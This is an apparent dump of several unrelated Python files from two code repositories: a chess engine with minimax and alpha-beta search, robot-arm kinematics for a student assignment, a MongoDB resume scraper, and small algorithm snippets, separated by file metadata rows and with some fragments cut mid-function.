location_2[1] += 1
if self.check_occupied_by_self(tuple(location_2)) == 0:
moves.append([location_1, tuple(location_2)])
else:
break
if self.check_occupied_by_other(tuple(location_2)) == 1:
break
location_2 = list(location_1)
while location_2[0] != 0 and location_2[1] != 0:
location_2[0] -= 1
location_2[1] -= 1
if self.check_occupied_by_self(tuple(location_2)) == 0:
moves.append([location_1, tuple(location_2)])
else:
break
if self.check_occupied_by_other(tuple(location_2)) == 1:
break
return moves
def pawn_move(self, turn, location_1):
moves = []
x = location_1[0]
y = location_1[1]
if turn == Side.White:
if y != 0:
y1 = y - 1
location_2 = (x, y1)
piece = self.get_boardpiece(location_2)
if piece == None:
move = [location_1, location_2]
moves.append(move)
if x != 0:
x1 = x - 1
location_2 = (x1, y1)
if self.check_occupied_by_other(location_2) == 1:
move = [location_1, location_2]
moves.append(move)
if x != 7:
x1 = x + 1
location_2 = (x1, y1)
if self.check_occupied_by_other(location_2) == 1:
move = [location_1, location_2]
moves.append(move)
else:
if y != 7:
y1 = y + 1
location_2 = (x, y1)
if self.check_occupied_by_self(location_2) == 1:
move = [location_1, location_2]
moves.append(move)
if x != 0:
x1 = x - 1
location_2 = (x1, y1)
if self.check_occupied_by_other(location_2) == 1:
move = [location_1, location_2]
moves.append(move)
if x != 7:
x1 = x + 1
location_2 = (x1, y1)
if self.check_occupied_by_other(location_2) == 1:
move = [location_1, location_2]
moves.append(move)
return moves
def check_occupied_by_self(self, location):
turn = self.turn
piece = self.get_boardpiece(location)
if piece != None:
if piece.side == turn:
return 1
return 0
def check_occupied_by_other(self, location):
turn = self.turn
piece = self.get_boardpiece(location)
if piece != None:
if piece.side != turn:
return 1
return 0
def rook_move(self, turn, location_1):
location_2 = list(location_1)
moves = []
while location_2[0] != 7:
location_2[0] += 1
if self.check_occupied_by_self(tuple(location_2)) == 0:
moves.append([location_1, tuple(location_2)])
else:
break
if self.check_occupied_by_other(tuple(location_2)) == 1:
break
location_2 = list(location_1)
while location_2[0] != 0:
location_2[0] -= 1
if self.check_occupied_by_self(tuple(location_2)) == 0:
moves.append([location_1, tuple(location_2)])
else:
break
if self.check_occupied_by_other(tuple(location_2)) == 1:
break
location_2 = list(location_1)
while location_2[1] != 7:
location_2[1] += 1
if self.check_occupied_by_self(tuple(location_2)) == 0:
moves.append([location_1, tuple(location_2)])
else:
break
if self.check_occupied_by_other(tuple(location_2)) == 1:
break
location_2 = list(location_1)
while location_2[1] != 0:
location_2[1] -= 1
if self.check_occupied_by_self(tuple(location_2)) == 0:
moves.append([location_1, tuple(location_2)])
else:
break
if self.check_occupied_by_other(tuple(location_2)) == 1:
break
return moves
def king_move(self, turn, location_1):
moves = []
x = location_1[0]
y = location_1[1]
if y != 0:
lower_y = y - 1
location_2 = (x, lower_y)
if self.check_occupied_by_self(location_2) == 0:
move = [location_1, location_2]
moves.append(move)
if x != 0:
lower_x = x - 1
location_2 = (lower_x, lower_y)
if self.check_occupied_by_self(location_2) == 0:
move = [location_1, location_2]
moves.append(move)
if x != 7:
upper_x = x + 1
location_2 = (upper_x, lower_y)
if self.check_occupied_by_self(location_2) == 0:
move = [location_1, location_2]
moves.append(move)
if x != 0:
lower_x = x - 1
location_2 = (lower_x, y)
if self.check_occupied_by_self(location_2) == 0:
move = [location_1, location_2]
moves.append(move)
if y != 7:
upper_y = y + 1
location_2 = (lower_x, upper_y)
if self.check_occupied_by_self(location_2) == 0:
move = [location_1, location_2]
moves.append(move)
if x != 7:
upper_x = x + 1
location_2 = (upper_x, y)
if self.check_occupied_by_self(location_2) == 0:
move = [location_1, location_2]
moves.append(move)
if y != 7:
upper_y = y + 1
location_2 = (upper_x, upper_y)
if self.check_occupied_by_self(location_2) == 0:
move = [location_1, location_2]
moves.append(move)
if y != 7:
upper_y = y + 1
location_2 = (x, upper_y)
if self.check_occupied_by_self(location_2) == 0:
move = [location_1, location_2]
moves.append(move)
return moves
def translate_coordinates(self, total_moves):
total_moves_notation = []
for move in total_moves:
notation_move = ""
for coordinate in move:
notation_move += to_notation(coordinate)
total_moves_notation.append(notation_move)
return total_moves_notation
# This function should return, given the move specified (in the format
# 'd2d3') whether this move is legal
# TODO: write an implementation for this function, implement it in terms
# of legal_moves()
def is_legal_move(self, move):
if move in self.legal_moves():
return True
else:
return False
def score_total_pieces(chessboard):
    """Sum the material value of every piece on the board.
    White pieces add to the score, Black pieces subtract. Values:
    pawn=1, rook=5, horse=5, queen=50, king=100.
    (Module-level helper operating on a ChessBoard instance.)
    """
    score = 0
    for y in range(0, 8):
        for x in range(0, 8):
            piece = chessboard.get_boardpiece((x, y))
            if piece is None:
                continue
            value = {Material.Pawn: 1,
                     Material.Rook: 5,
                     Material.Horse: 5,
                     Material.King: 100,
                     Material.Queen: 50}.get(piece.material, 0)
            # Sign by ownership: White positive, Black negative.
            score += value if piece.side == Side.White else -value
    return score
# This static class is responsible for providing functions that can calculate
# the optimal move using minimax
class ChessComputer:
# This method uses either alphabeta or minimax to calculate the best move
# possible. The input needed is a chessboard configuration and the max
# depth of the search algorithm. It returns a tuple of (score, chessboard)
# with score the maximum score attainable and chessboardmove that is needed
# to achieve this score.
@staticmethod
def computer_move(chessboard, depth, alphabeta=False):
if alphabeta:
inf = 99999999
min_inf = -inf
return ChessComputer.alphabeta(chessboard, depth, min_inf, inf)
else:
return ChessComputer.minimax(chessboard, depth)
# This function uses minimax to calculate the next move. Given the current
# chessboard and max depth, this function should return a tuple of the
# the score and the move that should be executed
# NOTE: use ChessComputer.evaluate_board() to calculate the score
# of a specific board configuration after the max depth is reached
# TODO: write an implementation for this function
    @staticmethod
    def minimax(chessboard, depth):
        """Plain minimax search to `depth` plies.
        Returns (best_score, best_move_string); at a leaf the move string
        is the placeholder "there is no move anymore"."""
        inf = 99999999
        min_inf = -inf
        turn = chessboard.turn
        # Leaf: depth exhausted or one of the kings has been captured.
        if depth == 0 or chessboard.is_king_dead(Side.Black) or chessboard.is_king_dead(Side.White):
            return (ChessComputer.evaluate_board(chessboard, depth), "there is no move anymore")
        # Maximizer white
        if turn == Side.White:
            bestValue = min_inf
            # NOTE(review): if legal_moves() is empty, bestMove stays None
            # and the caller concatenates it into a string -- confirm.
            bestMove = None
            for move in chessboard.legal_moves():
                new_board = chessboard.make_move(move)
                value, move1 = ChessComputer.minimax(new_board, depth - 1)
                if value > bestValue:
                    bestValue = value
                    bestMove = move
            return (bestValue, bestMove)
        # Minimizer black
        else:
            bestValue = inf
            bestMove = None
            for move in chessboard.legal_moves():
                new_board = chessboard.make_move(move)
                value, move1 = ChessComputer.minimax(new_board, depth - 1)
                if value < bestValue:
                    bestValue = value
                    bestMove = move
            return (bestValue, bestMove)
# This function uses alphabeta to calculate the next move. Given the
# chessboard and max depth, this function should return a tuple of the
# the score and the move that should be executed.
# It has alpha and beta as extra pruning parameters
# NOTE: use ChessComputer.evaluate_board() to calculate the score
# of a specific board configuration after the max depth is reached
    @staticmethod
    def alphabeta(chessboard, depth, alpha, beta):
        """Minimax with alpha-beta pruning; same contract as minimax().
        `alpha`/`beta` bound the scores still worth exploring."""
        turn = chessboard.turn
        # Leaf: depth exhausted or one of the kings has been captured.
        if depth == 0 or chessboard.is_king_dead(Side.Black) or chessboard.is_king_dead(Side.White):
            return (ChessComputer.evaluate_board(chessboard, depth), "there is no move anymore")
        # Maximizer white
        if turn == Side.White:
            # NOTE(review): seeding bestValue with alpha (instead of -inf)
            # means that when every line scores <= alpha, bestMove stays
            # None and alpha itself is returned as the score -- confirm
            # this fail-hard behaviour is intended.
            bestValue = alpha
            bestMove = None
            for move in chessboard.legal_moves():
                new_board = chessboard.make_move(move)
                value, move1 = ChessComputer.alphabeta(new_board, depth - 1, alpha, beta)
                if value > bestValue:
                    bestValue = value
                    bestMove = move
                if value > alpha:
                    alpha = value
                # Cutoff: the minimizer above will never allow this line.
                if beta <= alpha:
                    break
            return (bestValue, bestMove)
        # Minimizer black
        else:
            # NOTE(review): symmetric fail-hard seeding with beta -- confirm.
            bestValue = beta
            bestMove = None
            for move in chessboard.legal_moves():
                new_board = chessboard.make_move(move)
                value, move1 = ChessComputer.alphabeta(new_board, depth - 1, alpha, beta)
                if value < bestValue:
                    bestValue = value
                    bestMove = move
                if value < beta:
                    beta = value
                # Cutoff: the maximizer above will never allow this line.
                if beta <= alpha:
                    break
            return (bestValue, bestMove)
# Calculates the score of a given board configuration based on the
# material left on the board. Returns a score number, in which positive
# means white is better off, while negative means black is better of
@staticmethod
def evaluate_board(chessboard, depth_left):
total_score = 0
total_score += ChessBoard.score_total_pieces(chessboard)
#print("total_score without depth", total_score)
if depth_left > 0:
total_score = total_score*(depth_left*10)
return total_score
# This class is responsible for starting the chess game, playing and user
# feedback
class ChessGame:
    """Interactive driver: loads a board, then alternates computer analysis
    and human moves until a king is captured or the user quits."""
    def __init__(self, turn):
        # NOTE: you can make this depth higher once you have implemented
        # alpha-beta, which is more efficient
        self.depth = 5
        self.chessboard = ChessBoard(turn)
        # If a file was specified as commandline argument, use that filename
        if len(sys.argv) > 1:
            filename = sys.argv[1]
        else:
            filename = "board_configurations/mate_in_two1.chb"
            # filename = "board_test1.chb"
        print("Reading from " + filename + "...")
        self.load_from_file(filename)
    def load_from_file(self, filename):
        # Read the board layout (and trailing turn marker) from a .chb file.
        with open(filename) as f:
            content = f.read()
        self.chessboard.load_from_input(content)
    def main(self):
        """Game loop: show the board and score, compute the best move, then
        ask the human for a move."""
        while True:
            print(self.chessboard)
            # Print the current score
            score = ChessComputer.evaluate_board(self.chessboard, self.depth)
            print("Current score: " + str(score))
            # Calculate the best possible move
            new_score, best_move = self.make_computer_move()
            print("Best move: " + best_move)
            print("Score to achieve: " + str(new_score))
            print("")
            print("new board is:")
            print(self.chessboard.make_move(best_move))
            self.make_human_move()
    def make_computer_move(self):
        # Returns a (score, move_string) tuple from the alpha-beta search.
        print("Calculating best move...")
        return ChessComputer.computer_move(self.chessboard,
                                           self.depth, alphabeta=True)
    def make_human_move(self):
        # Endlessly request input until the right input is specified
        while True:
            # raw_input only exists on Python 2.
            if sys.version_info[:2] <= (2, 7):
                move = raw_input("Indicate your move (or q to stop): ")
            else:
                move = input("Indicate your move (or q to stop): ")
            if move == "q":
                print("Exiting program...")
                sys.exit(0)
            elif self.chessboard.is_legal_move(move):
                break
            print("Incorrect move!")
        self.chessboard = self.chessboard.make_move(move)
        # Exit the game if one of the kings is dead
        if self.chessboard.is_king_dead(Side.Black):
            print(self.chessboard)
            print("White wins!")
            sys.exit(0)
        elif self.chessboard.is_king_dead(Side.White):
            print(self.chessboard)
            print("Black wins!")
            sys.exit(0)
chess_game = ChessGame(Side.Black)
chess_game.main() | Python | 718 | 35.536213 | 100 | /chessgame_herstel.py | 0.498285 | 0.480482 |
ClaartjeBarkhof/ZoekenSturenBewegen | refs/heads/master | Rook, King, Pawn, Queen, Horse = ['r', 'k', 'p', 'q', 'h']
if material == Material.Queen:
moves = self.queen_move(turn, location)
if moves != []:
total_moves.extend(moves)
if material == Material.Horse:
moves = self.horse_move(turn, location)
if move != []:
total_moves.extend(moves)
def horse_move(self, turn, location_1):
moves = []
x = location_1[0]
y = location_1[1]
if y > 1:
y1 = y - 2
if x != 0:
x1 = x - 1
location_2 = (x1, y1)
if self.check_occupied_by_self(location_2) == 0:
move = (location_1, location_2)
moves.append(move)
if x != 8:
x1 = x + 1
location_2 = (x1, y1)
if self.check_occupied_by_self(location_2) == 0:
move = (location_1, location_2)
moves.append(move)
if y < 6:
y1 = y + 2
if x != 0:
x1 = x - 1
location_2 = (x1, y1)
if self.check_occupied_by_self(location_2) == 0:
move = (location_1, location_2)
moves.append(move)
if x != 8:
x1 = x + 1
location_2 = (x1, y1)
if self.check_occupied_by_self(location_2) == 0:
move = (location_1, location_2)
moves.append(move)
if x > 1:
x1 = x - 2
if y != 0:
y1 = y - 1
location_2 = (x1, y1)
if self.check_occupied_by_self(location_2) == 0:
move = (location_1, location_2)
moves.append(move)
if y != 8:
y1 = y + 1
location_2 = (x1, y1)
if self.check_occupied_by_self(location_2) == 0:
move = (location_1, location_2)
moves.append(move)
if x < 6:
x1 = x + 2
if y != 0:
y1 = y - 1
location_2 = (x1, y1)
if self.check_occupied_by_self(location_2) == 0:
move = (location_1, location_2)
moves.append(move)
if y != 8:
y1 = y + 1
location_2 = (x1, y1)
if self.check_occupied_by_self(location_2) == 0:
move = (location_1, location_2)
moves.append(move)
return moves
def queen_move(self, turn, location_1):
moves = []
location_2 = list(location_1)
rook_moves = self.rook_move(turn,location_1)
moves.extend(rook_moves)
while location_2[0] != 7 and location_2[1] != 0:
location_2[0] += 1
location_2[1] -= 1
if self.check_occupied_by_self(tuple(location_2)) == 0:
moves.append([location_1, tuple(location_2)])
else:
break
if self.check_occupied_by_other(tuple(location_2)) == 1:
break
location_2 = list(location_1)
while location_2[0] != 7 and location_2[1] != 7:
location_2[0] += 1
location_2[1] += 1
if self.check_occupied_by_self(tuple(location_2)) == 0:
moves.append([location_1, tuple(location_2)])
else:
break
if self.check_occupied_by_other(tuple(location_2)) == 1:
break
location_2 = list(location_1)
while location_2[0] != 0 and location_2[1] != 7:
location_2[0] -= 1
location_2[1] += 1
if self.check_occupied_by_self(tuple(location_2)) == 0:
moves.append([location_1, tuple(location_2)])
else:
break
if self.check_occupied_by_other(tuple(location_2)) == 1:
break
location_2 = list(location_1)
while location_2[0] != 0 and location_2[1] != 0:
location_2[0] -= 1
location_2[1] -= 1
if self.check_occupied_by_self(tuple(location_2)) == 0:
moves.append([location_1, tuple(location_2)])
else:
break
if self.check_occupied_by_other(tuple(location_2)) == 1:
break
return moves
if material == Material.Queen:
if side == Side.White:
score += 50
else:
score -= 50 | Python | 125 | 35.119999 | 68 | /test.py | 0.442623 | 0.402082 |
ClaartjeBarkhof/ZoekenSturenBewegen | refs/heads/master | #!python2
from __future__ import division, print_function
from umi_parameters import UMI_parameters
from umi_common import *
import math
import numpy as np
from visual import *
# Specifications of UMI
# Enter the correct details in the corresponding file (umi_parameters.py).
# <<<<<<<<<<-------------------------------------------------------------------- TODO FOR STUDENTS
UMI = UMI_parameters()
################################
# ZSB - Opdracht 2 #
# umi_student_functions.py #
# 16/06/2017 #
# #
# Anna Stalknecht - 10792872 #
# Claartje Barkhof - 11035129 #
# Group C #
# #
################################
'''
This file contains functions for the support of the UMI robot.
We implemented 3 functions: apply_inverse_kinematics, board_position_to_cartesian,
high_path and move_to_garbage. We implemented them making use of de slides of Leo Dorst on Robotics.
'''
def apply_inverse_kinematics(x, y, z, gripper):
    ''' Computes the angles of the joints, given some real world coordinates
        making use of inverse kinematics based on the Robotics readers made by
        Leo Dorst.
        :param float x: cartesian x-coordinate
        :param float y: cartesian y-coordinate
        :param float z: cartesian z-coordinate
        :param float gripper: gripper opening, passed through unchanged
        :return: Tuple (riser_position, shoulder_angle, elbow_angle,
                 wrist_angle, gripper); angles are in degrees.
    '''
    # The riser compensates for the total height of the arm assembly.
    riser_position = y + UMI.total_arm_height
    # Planar 2-link IK in the horizontal plane: the IK "x" axis is world x,
    # the IK "y" axis is world z.
    x_ik = x
    y_ik = z
    l_1 = UMI.upper_length
    l_2 = UMI.lower_length
    # Law of cosines for the elbow joint.
    elbow_angle = math.acos((x_ik ** 2 + y_ik ** 2 - l_1 ** 2 - l_2 ** 2)
                            / (2 * l_1 * l_2))
    s_2 = math.sqrt(1 - math.cos(elbow_angle) ** 2)
    # BUGFIX: atan2 and degrees were called unqualified, silently relying on
    # the `from visual import *` star import; qualify them with math for
    # consistency with the rest of the function.
    shoulder_angle = math.atan2(y_ik, x_ik) - \
        math.atan2(l_2 * s_2, l_1 + l_2 * math.cos(elbow_angle))
    # Resulting angles in degrees
    elbow_angle = math.degrees(elbow_angle)
    shoulder_angle = math.degrees(shoulder_angle)
    # The wrist counter-rotates the other two joints so the gripper keeps
    # its world orientation.
    wrist_angle = (-elbow_angle - shoulder_angle)
    return (riser_position, shoulder_angle, elbow_angle, wrist_angle, gripper)
def board_position_to_cartesian(chessboard, position):
    ''' Convert a position between [a1-h8] to its cartesian coordinates in
        frameworld coordinates, by rotating the board-local field offset
        around the board origin (the corner behind h8) over the board angle.
        :param obj chessboard: The instantiation of the chessboard to use.
        :param str position: A position in the range [a1-h8], or the special
                             garbage location 'j5' (two rows behind the board).
        :return: tuple Return a position in the format (x, y, z)
    '''
    if position == 'j5':
        # Special garbage drop-off location outside the board.
        row = -2
        column = 3
    else:
        # Board-local indices in the 0-7 range, measured from h8.
        letter_list = ['h', 'g', 'f', 'e', 'd', 'c', 'b', 'a']
        number_list = [8, 7, 6, 5, 4, 3, 2, 1]
        column = letter_list.index(position[0])
        row = number_list.index(int(position[1]))
    # BUGFIX: the transform below used to live inside the else-branch, so
    # the 'j5' garbage location raised NameError on the undefined
    # world coordinates; it now applies to both cases.
    angle = -(chessboard.get_angle_radians())
    field_size = chessboard.field_size  # meters
    (ox, oy, oz) = chessboard.get_position()  # origin of rotation
    # Offsets of the field centre, measured from h8 (the origin of rotation).
    dz = (column + 0.5) * field_size
    dx = (row + 0.5) * field_size
    # Unrotated world-frame position of the field centre.
    pz = oz + dz
    px = ox + dx
    # Rotate the point around the board origin in the x-z plane.
    world_coordinate_z = oz + math.cos(angle) * (pz - oz) - math.sin(angle) * (px - ox)
    world_coordinate_x = ox + math.sin(angle) * (pz - oz) + math.cos(angle) * (px - ox)
    # The height (y) is not affected by the rotation.
    world_coordinate_y = chessboard.get_board_height()
    return (world_coordinate_x, world_coordinate_y, world_coordinate_z)
def high_path(chessboard, from_pos, to_pos):
    '''
    Computes the high path that the arm can take to move a piece from one place on the board to another.

    The arm descends over the source tile, grips at half the piece's height,
    lifts back to a safe height, travels, and mirrors the sequence over the
    destination tile.

    :param chessboard: Chessboard object
    :param from_pos: [a1-h8]
    :param to_pos: [a1-h8]
    :return: Returns a list of instructions for the GUI.
    '''
    sequence_list = []
    # We assume that 20 centimeter above the board is safe.
    safe_height = 0.2
    # We assume that 10 centimeter above the board is "low".
    low_height = 0.1
    # Get the coordinates (y components are unused: heights are fixed above).
    (from_x, _from_y, from_z) = board_position_to_cartesian(chessboard, from_pos)
    (to_x, _to_y, to_z) = board_position_to_cartesian(chessboard, to_pos)
    # Define half_piece_height according to which piece you are encountering (material).
    # Only the material matters here; id and colour are deliberately ignored.
    _piece_id, material, _colour = chessboard.pieces[from_pos]
    half_piece_height = (chessboard.pieces_height[material]/2)+chessboard.get_board_height()
    # Hover above the first field on SAFE height:
    sequence_list.append(apply_inverse_kinematics(from_x, safe_height, from_z, chessboard.field_size))
    # Hover above the first field on LOW height:
    sequence_list.append(apply_inverse_kinematics(from_x, low_height, from_z, chessboard.field_size))
    # Hover above the first field on half of the piece height:
    sequence_list.append(apply_inverse_kinematics(from_x, half_piece_height, from_z, chessboard.field_size))
    # Grip the piece (gripper width 0 = closed)
    sequence_list.append(apply_inverse_kinematics(from_x, half_piece_height, from_z, 0))
    # Give instruction to GUI to pickup piece
    sequence_list.append(["GUI", "TAKE", from_pos])
    # Hover above the first field on SAFE height, keeping the gripper closed
    sequence_list.append(apply_inverse_kinematics(from_x, safe_height, from_z, 0))
    # Move to new position on SAFE height
    sequence_list.append(apply_inverse_kinematics(to_x, safe_height, to_z, 0))
    # Hover above the second field on LOW height:
    sequence_list.append(apply_inverse_kinematics(to_x, low_height, to_z, 0))
    # Hover above the second field on half of the piece height (gripper opens):
    sequence_list.append(apply_inverse_kinematics(to_x, half_piece_height, to_z, chessboard.field_size))
    # Give instruction to GUI to drop piece
    sequence_list.append(["GUI", "DROP", to_pos])
    # Move to new position on SAFE height (And open the gripper)
    sequence_list.append(apply_inverse_kinematics(to_x, safe_height, to_z, chessboard.field_size))
    return sequence_list
def move_to_garbage(chessboard, from_pos):
    '''
    Computes the high path that the arm can take to move a piece from one place on the board to the garbage location.

    :param chessboard: Chessboard object
    :param from_pos: [a1-h8]
    :return: Returns a list of instructions for the GUI.
    '''
    sequence_list = []
    # We assume that 20 centimeter above the board is safe.
    safe_height = 0.2
    # We assume that 10 centimeter above the board is "low".
    low_height = 0.1
    # 'j5' is the special off-board garbage location.
    drop_location = "j5"
    # Look up the piece's material to size the gripping height.
    # FIX: the original referenced `material` here without defining it,
    # raising a NameError on every call.
    _piece_id, material, _colour = chessboard.pieces[from_pos]
    half_piece_height = (chessboard.pieces_height[material]/2)+chessboard.get_board_height()
    # Get the coordinates (y components are unused: heights are fixed above).
    (from_x, _from_y, from_z) = board_position_to_cartesian(chessboard, from_pos)
    (to_x, _to_y, to_z) = board_position_to_cartesian(chessboard, drop_location)
    # Hover above the first field on SAFE height:
    sequence_list.append(apply_inverse_kinematics(from_x, safe_height, from_z, chessboard.field_size))
    # Hover above the first field on LOW height:
    sequence_list.append(apply_inverse_kinematics(from_x, low_height, from_z, chessboard.field_size))
    # Hover above the first field on half of the piece height:
    sequence_list.append(apply_inverse_kinematics(from_x, half_piece_height, from_z, chessboard.field_size))
    # Grip the piece (gripper width 0 = closed)
    sequence_list.append(apply_inverse_kinematics(from_x, half_piece_height, from_z, 0))
    # Give instruction to GUI to pickup piece
    sequence_list.append(["GUI", "TAKE", from_pos])
    # Hover above the first field on SAFE height (Keep the gripper closed!!):
    sequence_list.append(apply_inverse_kinematics(from_x, safe_height, from_z, 0))
    # Move to new position on SAFE height
    sequence_list.append(apply_inverse_kinematics(to_x, safe_height, to_z, 0))
    # Hover above the second field on LOW height:
    sequence_list.append(apply_inverse_kinematics(to_x, low_height, to_z, 0))
    # Hover above the second field on half of the piece height (gripper opens):
    sequence_list.append(apply_inverse_kinematics(to_x, half_piece_height, to_z, chessboard.field_size))
    # Give instruction to GUI to drop piece
    sequence_list.append(["GUI", "DROP", drop_location])
    # Move to new position on SAFE height (And open the gripper)
    sequence_list.append(apply_inverse_kinematics(to_x, safe_height, to_z, chessboard.field_size))
    return sequence_list
ClaartjeBarkhof/ZoekenSturenBewegen | refs/heads/master | #!python2
from __future__ import division, print_function
################################
# ZSB - Opdracht 2 #
# umi_parameters.py #
# 16/06/2017 #
# #
# Anna Stalknecht - 10792872 #
# Claartje Barkhof - 11035129 #
# Group C #
# #
################################
class UMI_parameters:
    """Physical dimensions and joint limits of the UMI RTX arm.

    Lengths are in meters; rotational joint limits are in degrees.
    """

    def __init__(self):
        # --- Riser (zed) ---
        self.hpedestal = 1.082          # riser travel d_i, meters
        self.pedestal_offset = 0.0675   # riser offset a_i, meters
        self.wpedestal = 0.1            # pedestal width; leave at 0.1

        # --- Upper arm ---
        self.upper_length = 0.2535      # shoulder a_i, meters
        self.upper_height = 0.095       # shoulder d_i, meters

        # --- Lower arm ---
        self.lower_length = 0.2535      # elbow a_i, meters
        self.lower_height = 0.080       # elbow d_i, meters

        # --- Wrist ---
        self.wrist_height = 0.09        # wrist d_i, meters

        # Height of the arm from the very top of the riser down to the
        # tip of the gripper.
        self.total_arm_height = self.pedestal_offset + self.upper_height \
                                + self.lower_height + self.wrist_height

        # Joint ranges: meters for Riser/Gripper, degrees for the rest.
        # TODO for students: replace the min/max degrees per joint — they
        # are NOT the same for shoulder, elbow and wrist.
        self.joint_ranges = {
            "Riser": [0.0, 0.925],
            "Shoulder": [-90.0, 90.0],
            "Elbow": [-180.0, 110.0],
            "Wrist": [-110.0, 110.0],
            "Gripper": [0, 0.05],
        }

    def correct_height(self, y):
        """Map y in [0, hpedestal] onto the arm's [-hpedestal/2, hpedestal/2] range.

        The real arm runs from -hpedestal/2 to hpedestal/2, while y runs
        from 0 to hpedestal.
        """
        return y - 0.5 * self.hpedestal
| Python | 56 | 35.125 | 126 | /week2/umi_parameters.py | 0.522986 | 0.475037 |
ClaartjeBarkhof/ZoekenSturenBewegen | refs/heads/master | # ZSB - Opdracht 2 #
# errorreport.py #
# 16/06/2017 #
# #
# Anna Stalknecht - 10792872 #
# Claartje Barkhof - 11035129 #
# Group C #
# #
################################
'''
error report
We started implementing the board_position_to_cartesian function. This function was
tested by printing the cartesian values to see if they matched our calculation.
We also printed the board_position and the value of index function to see if it was working
correctly.
Then we implemented the high_path function which we tested by running the program and
pressing compute high path. We then checked the joints_simulation.txt file and saw that
something had changed. We couldn't really test it more because we first had to implement
the inverse_kinematics.
So we made the inverse_kinematics function. And now we had the possibility to test it by
running the program. At first the program wasn't working properly because it took chesspieces
from the table instead of from the chessboard. We found out that it was because we switched x
and z axes.
Then we tried rotating the chessboard and we found out that our board_position_to_cartesian wasn't
working properly. It was only working when we turned the chessboard 0 or 180 degrees. That was because
we walked from h8 at the right angle but it didn't work the way we wanted. Then we changed
the function so it would calculate the cartesian from the original angle (0 degrees), and then
transformed that position to the new position at the right angle. Then it worked.
We then had an error rotating the chessboard -20 degrees: the shoulder_angle gave a math error.
That was because the arms are not big enough to reach the top of the board at that angle.
When we placed the board closer to the gripper, our program worked properly again.
''' | Python | 39 | 47.384617 | 103 | /week2/Errorreport.py | 0.71474 | 0.697243 |
LalithBabu18/python-beautifulsoup | refs/heads/master | import json
import pymongo
from bs4 import BeautifulSoup
# Connect to MongoDB and stream every stored resume document.
client = pymongo.MongoClient("mongodb+srv://localhost")
db = client.test
col = db["resumes"]
documents = col.find({}, no_cursor_timeout=True)
new_col = db["resultResumes"]


def _squashed_text(tag):
    """Return the tag's text with all whitespace collapsed, or '' if tag is None."""
    if tag is None:
        return ""
    return " ".join(tag.get_text().split())


for raw in documents:
    soup = BeautifulSoup(''.join(raw["Resume-Html"]), features="html.parser")
    # `record` instead of `dict` so the builtin is not shadowed.
    record = {
        '_id': raw['_id'],
        'createdTime': raw['createdTime'],
        'Title': raw['Title'],
        'Location': _squashed_text(soup.find('p', attrs={'class': 'locality'})),
    }
    # Strip the literal "Education" section heading from the section text.
    education = _squashed_text(soup.find('div', attrs={'class': 'section-item education-content'}))
    record['Education'] = education.replace('Education', '')

    if soup.find('div', attrs={'class': 'section-item workExperience-content'}) is not None:
        experiences = []
        for section in soup.findAll('div', attrs={'class': 'work-experience-section'}):
            # FIX: each field is recomputed per section. The original only
            # assigned a field when it was found, so missing fields silently
            # reused the value from a previous iteration (stale-variable bug),
            # and raised NameError on the very first section.
            title = _squashed_text(section.find('p', attrs={'class': 'work_title'}))
            company = _squashed_text(section.find('div', attrs={'class': 'work_company'}))
            dates = _squashed_text(section.find('p', attrs={'class': 'work_dates'}))
            description = _squashed_text(section.find('p', attrs={'class': 'work_description'}))
            experiences.append(title + company + dates + description)
        record['WorkExperience'] = experiences
    else:
        record['WorkExperience'] = ""

    # First work_company on the page is assumed to be the current employer.
    record['CurrentCompany'] = _squashed_text(soup.find('div', attrs={'class': 'work_company'}))

    skills_tag = soup.find('div', attrs={'class': 'data_display'})
    record['Skills'] = [_squashed_text(skills_tag)] if skills_tag is not None else ""

    record['Introduction'] = _squashed_text(soup.find('p', attrs={'class': 'summary'}))

    # Debug separator prints from the original were removed.
    new_col.insert_one(record)
| Python | 100 | 34.900002 | 92 | /test.py | 0.537883 | 0.537326 |
KartikTalwar/playground | refs/heads/master | import subprocess
def shell(command, stdout=True):
    """Run *command* through the system shell.

    With stdout=True (default) the command's captured output is returned
    (bytes on Python 3); otherwise the command's return code is returned
    and a non-zero exit raises CalledProcessError.
    """
    runner = subprocess.check_output if stdout else subprocess.check_call
    return runner(command, shell=True)
print shell('ls')
| Python | 8 | 23 | 55 | /python/shell.py | 0.755208 | 0.755208 |
def stringPermutations(string):
    """Return all permutations of *string*, each as a string.

    Each character in turn is taken as the leading character, followed by
    every permutation of the remaining characters (recursively).
    """
    if len(string) < 2:
        return [string]
    return [string[pos] + tail
            for pos in range(len(string))
            for tail in stringPermutations(string[:pos] + string[pos + 1:])]
print stringPermutations('abc') # ['abc', 'acb', 'bac', 'bca', 'cab', 'cba']
| Python | 14 | 28.5 | 76 | /random/StringPermutations.py | 0.57385 | 0.566586 |
def mapper(function, *params):
    """Apply *function* across the given sequences in lockstep.

    Like map() over multiple iterables: stops at the shortest sequence and
    returns a list of results.
    """
    return [function(*bundle) for bundle in zip(*params)]
print mapper(abs, [-3, 5, -1, 42, 23])
print mapper(pow, [1, 2, 3], [2, 3, 4, 5]) | Python | 8 | 23.125 | 42 | /python/ArbitraryMapper.py | 0.604167 | 0.53125 |
def powerset(array):
    """Return the power set of *array* as a list of lists.

    FIX: the original indexed `array[i]` with the *element* `i` as subscript,
    so it only worked for inputs equal to range(n) and crashed or produced
    wrong results otherwise. Each element itself is appended now.
    """
    ps = [[]]
    for item in array:
        # Every existing subset spawns a copy extended with the new element.
        ps += [subset + [item] for subset in ps]
    return ps
print powerset([0, 1, 2, 3])
| Python | 7 | 19.285715 | 42 | /computation/powerset.py | 0.5 | 0.471831 |
KartikTalwar/playground | refs/heads/master | import functools
def my_check(func):
    """Decorator demo: short-circuits the wrapped view with 'failure'.

    The guard condition (1 != 2) is always true, so the wrapped function is
    never actually invoked — this mirrors a login/permission-check skeleton.
    """
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        if 1 != 2:
            return 'failure'
        return func(*args, **kwargs)
    return wrapper
# FIX: the original checked `__namae__` (typo), which raised NameError when
# the module was executed.
if __name__ == '__main__':
    @my_check
    def hello():
        return 'success'
def stringCombinations(string, right = ''):
    """Print every subsequence of *string* (including the empty one).

    Each character is either prepended to the accumulator `right` or skipped,
    so accumulated characters come out in reverse order.
    FIX: uses print() so the code runs on both Python 2 and 3 (the original
    `print right` statement is a SyntaxError on Python 3).
    """
    if not string:
        print(right)
        return
    stringCombinations(string[1:], string[0] + right)
    stringCombinations(string[1:], right)
stringCombinations('abcd')
| Python | 9 | 21.444445 | 50 | /random/StringCombinations.py | 0.732673 | 0.717822 |
def qsort(list):
    """Recursive quicksort returning a new sorted list.

    First element is the pivot; equal elements go to the right partition.
    (The parameter name shadows the builtin `list`; kept for call
